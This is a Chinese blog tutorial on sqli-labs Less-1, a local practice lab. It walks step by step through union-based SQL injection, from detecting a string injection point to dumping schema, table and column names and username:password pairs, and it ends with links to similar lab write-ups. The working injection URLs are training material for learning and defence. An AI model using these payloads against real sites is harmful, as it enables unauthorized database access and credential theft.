Sqli-labs-master注入详解:less-01

最新推荐文章于 2024-09-29 18:38:51 发布
最新推荐文章于 2024-09-29 18:38:51 发布
阅读量664 收藏 6
点赞数 3
分类专栏: sql注入 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43096078/article/details/108211183
版权

在学习之前需要先掌握一些基本知识:

1 连接数据库:mysql -uroot -p    	     // 回车 输入mysql密码 (root是对应的用户名)
2 查数据库:show databases; 	         // (mysql自带几个数据库,建议解下什么意思)
3 使用某一个数据库:use database_name;  //(database_name是库名)
4 查询数据库中的表:show tables;        //(固定用法)
5 查看具体的某一个表:select * from table_name;     //(table_name是表名)
6 查看具体的某一个字段:select user, password from table_name where id=1;  
//(user,password,id 都是表中具体的字段名)

查库、查表、查列、查字段有对应的统一使用方法:

1 查库:select schema_name from information_schema.schemata;
2 查表:select table_name from information_schema.tables where table_schema='security';
3 查列:select column_name from information_schema.columns where table_name='users';
4 查字段:select id,username,password from security.users;
//以上4种查询方式背下来,以后学了mysql自然会懂。

一. 判断是否存在注入点(less-01):

 1 构造如下语句:http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 //页面正常
 2 构造如下语句:http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 //页面正常
 基本可以判断为字符型注入。

 进一步验证:
 3 构造如下语句:http://127.0.0.1/sqli/Less-1/?id=1' and '1'='1 //页面正常
 4 构造如下语句:http://127.0.0.1/sqli/Less-1/?id=1' and '1'='2 //无回显数据判断为字符型注入。

如何判断是字符型注入还是数字型注入?以及sql语句是如何闭合的?

二.判断该表中存在的列数:

 1 既然知道了注入类型,构造如下语句:?id=1' --+ 注释掉最后面的那个单引号,就可以形成闭合,这样在 ?id=1'--+ 中间就可以插入其他select语句,进行恶意操作。
 2 我们要做的第一个事,就是判断一下当前位置的这个表有多少列(后面解释为什么要这样做)
 3 判断有多少列,我们使用 order by 子句。
	select * from table_name order by 1; //表示查询出的结果按照第一列进行排序,
	select * from table_name order by 2; //表示查询出的结果按照第二列进行排序,
	既然 order by 子句的功能是这样的,那么不难理解,不存在的列,当使用 order by 时,自然会报错,显示超出列的范围。通过这个子句,我们就可以判断当前表有多少列。
 4 判断的时候我们使用二分法,先试10,再试5,这样判断的快。
	本例中,我们通过判断 http://127.0.0.1/sqli/Less-1/?id=1' order by 3 --+
	正常显示,说明当前表只有3列。

为什么要使用–+进行注释?为什么使用#注释报错?%20、%23又是什么鬼?

三.使用union联合查询:

1.union用法:
UNION操作符用于合并两个或多个SELECT语句的结果集,而且UNION内部的SELECT语句必须拥
有相同数量的列,列也必须拥有相似的数据类型,同时,每条SELCCT语句中的列的顺序必须相同。
说白了,就是把两个表的结果拼接成为一个表,能够拼接的前提是两个表都用相同的列,你是3列,
我也是3列。
前面讲过我们要做的第一件事,是判断有多少列,主要目的就是为了使用union联合查询。
(因为要构造相同数量的列)

2.limit用法:
limit m,n 表示从m+1行开始,取n条记录;
select * from table_name limit 0,1;` 表示从table_name表中的第1行开始,取1条记录,
select * from table_name limit 1,1;` 表示从table_name表中的第2行开始,取1条记录;

3.group_concat()用法:
group_concat(id)  		    表示把id字段的值在同一行打印出来,逗号分隔(默认)
group_concat('*',id1,id2)   表示使用*进行分割,拼接id1和id2

进入uinon联合查询正题:

http://127.0.0.1/sqli/Less-1/?id=1' union select 1,2,3 --+ 
表示使用联合查询,把字段1,2,3拼接到了`select * from users where id='1'`的后面,
结果如下图:

网页中的效果
在这里插入图片描述
mysql数据库中的效果
在这里插入图片描述

初步出现了我们想要的结果,在页面上有了回显,这个时候我们就想,如果把select 1,2,3 中
的字段3,换成是查询库名那不就直接OK了?于是构造语句如下:
http://url/?id=1' union select 1,2,schema_name from information_schema.schemata--+

在这里插入图片描述

结果发现语句正常,但是显示的结果还是users表中的第一行数据,我们想到的是把id=1'这个地方
让他不显示数据,只显示union后面的数据,我们可以把1删掉。语句如下:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,schema_name from information_schema.schemata--+
我们发现,回显了我们想要的数据库名。

在这里插入图片描述

我们已经介绍了group_concat()函数,我们使用它就可以一次性的把库名显示出来,语句如下:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(schema_name) from information_schema.schemata --+

至此,库名已经全部爆了出来。

四.爆数据库中的表名:

http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

建议将后引入的单引号使用去掉,单引号括起来的数据转为16进制,0x表示16进制,如下:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

五.爆某表中的列名:

http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

建议将后引入的单引号使用去掉,单引号括起来的数据转为16进制,0x表示16进制,如下:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+

六.爆表中的数据:

查所有的用户:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(username) from security.users --+

查所有的密码:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(password) from security.users --+

这么看不直观,最好是用户名和密码是成对出现:使用concat_ws(':',A,B)函数,表示拼接
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,concat_ws(':',username,password) from security.users --+

拼接所有:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(concat_ws(':',username,password)) from security.users --+

建议将后引入的单引号使用去掉,单引号括起来的数据转为16进制,0x表示16进制,如下:
http://127.0.0.1/sqli/Less-1/?id=' union select 1,2,group_concat(concat_ws(0x3a,username,password)) from security.users --+

至此,数据库中的数据被爆了出来。

简单概括union注入流程如下:
 1.首先判断是否存在注入点及注入的类型。
 2.观察回显的位置。
 3.使用ORDER BY 查询列数。
 4.获取数据库名。
 5.获取数据库中的所有表名。
 6.获取数据库的表中的所有字段名。
 7.获取字段中的数据。

学习sql注入,了解成因,提高防护能力,遵纪守法!

Dooz
关注
专栏目录
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 618
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1542
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs-master【Less-1】
weixin_44352521的博客
12-04 298
首先在虚拟机中安装好Metasploitable2的靶机,然后查看地址,在浏览器的地址栏中输入:http://192.168.228.129/sqli-labs-master/Less-1/ 这里呢,我们可以先参照源码进行一步步渗透和注入! 可以看到$id是我们要输入的变量 sqli-labs-master/Less-1/ 1. 在地址栏中的URL后输入?id=1 http://192.168...
sqli-labs-master靶场11~20关
最新发布
m0_62284238的博客
09-29 574
sql注入靶场sqli-labs的11~20关。判断注入点类型、字段数,使用union联合注入、布尔注入、延时盲注以及报错盲注。
SQL注入sqli-labs-master Less-1详解
luoshiyong123的博客
03-28 1588
1.读题 一开始是这个界面,提示输入id,这里能够输入的地方只有http请求里边,所以输入: http://localhost./sqll/sqli-labs-master/Less-1/?id=1试一下,?id=1是httpget方法的格式。然后: 得到密码,当把id换成2,3,4都可以得到对应password。但是要实现查询各种信息还不行。接下来找注入点 2.找注入点 id=...
sqli-labs-master Less-1
Risker
04-10 1115
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
sqli-labs-master less-1 详解
m0_63521991的博客
01-29 1359
这行代码将从URL参数中获取的"id"值直接赋给变量$id,而没有对其进行任何过滤或转义。这导致了SQL注入漏洞的出现,可以通过在"id"参数中插入恶意的SQL代码来执行任意的数据库操作。” 将$id变量插入到SQL查询中,但没有对其进行任何过滤或转义,可以通过$id参数执行任意的数据库操作,而不受限于原始查询的意图。是 MySQL 数据库中的一个元数据(metadata)数据库,它包含了关于数据库、表、列、索引、权限等信息的元数据。联合查询 的前提是,两张表的列数相同,所以我们先表的判断列数。
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 829
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
Sqli-labs靶场第17关详解[Sqli-labs-less-17]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 882
根据题目及测试发现,注入点在New Password上并且后台会判断user是否存在,所以user选择一个知道的name:admin或domo。如果当前会话用户对包含 DBMS 可用数据库信息的系统表有读取权限,则可以枚举出当前数据库列表。,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。单引号 '闭合 -- 报错注入。爆出DBMS 所有数据库。
Sqli-labs靶场第8关详解[Sqli-labs-less-8]
m0_73615178的博客
02-24 1204
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()sql注入——布尔型盲注(Boolean-based blind)
sqli-labs-master靶场第二关详解
tangtang_888的博客
07-06 1839
1、点击进入sqli-labs-master靶场第二关Less-2 2、输入?id=1' and '1'='1,回显不正常,说明此处为数字型注入 3、依次输入?id=1 order by (1,2,3,4)--+,在输入4时出现报错,说明字段数为3
sqli-labs-master/Less 合集1
weixin_66503195的博客
07-22 206
用union selct 回显查询位置。使用 ordre by 查询有几列。进入靶场第一关,加参数id。
sqli-labs-master第一关Less-1超详细360°无死角教程
hih30250的博客
11-21 367
可以看到页面将错误的信息打印了出来,告诉我们是因为多了一个分号而导致的,那么我们就将我们输入的分号变为有效的让页面php代码给出的分号变为无效的。可以看到,当我们查看id=1的order by 到4的字段时报错了,所以字段数是3。可以看到,在字段2,3中可以注入查询命令查看数据。可能简陋了点,但并不妨碍我们练习。来获取当前数据库的名称以及数据库的用户名。”代表空格,避免字符串拼接使注释语法失效。接下来就好办了,我们使用union注入。的时候,页面给出了正常的数据。”代表注释后面的语句,“
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 378
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
sqli-labs-master less1-less6
bunengyongzho666的博客
08-02 1242
id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)--+id=0的') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+?
Sqli-Labs-Master】Less1-4
Oavinci的博客
06-06 530
phpstudy2016:链接:http://pan.baidu.com/s/1bpbEBCj 密码:fmr4 sqli-labs-master:链接:http://pan.baidu.com/s/1jH4WlMY 密码:11mj Less-1 ?id=1'报错 ?id=1'%23 返回正常 ?id=1' order by 3%23 返回正常 ?id=1' orde...
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
一纸荒芜的博客
06-23 5759
Sqli-labs-master靶场1-23关通关详细教程(基础篇)
sqli-labs less-1
zbbjya的博客
02-08 495
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
sqli-labs-master 全1-65(附解题思路及解题过程)
weixin_47306547的博客
09-08 2566
第 1-10 关 第 11-45 关 第 46-53 关 第 54-65 关 注:链接内容全为本人原创。
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值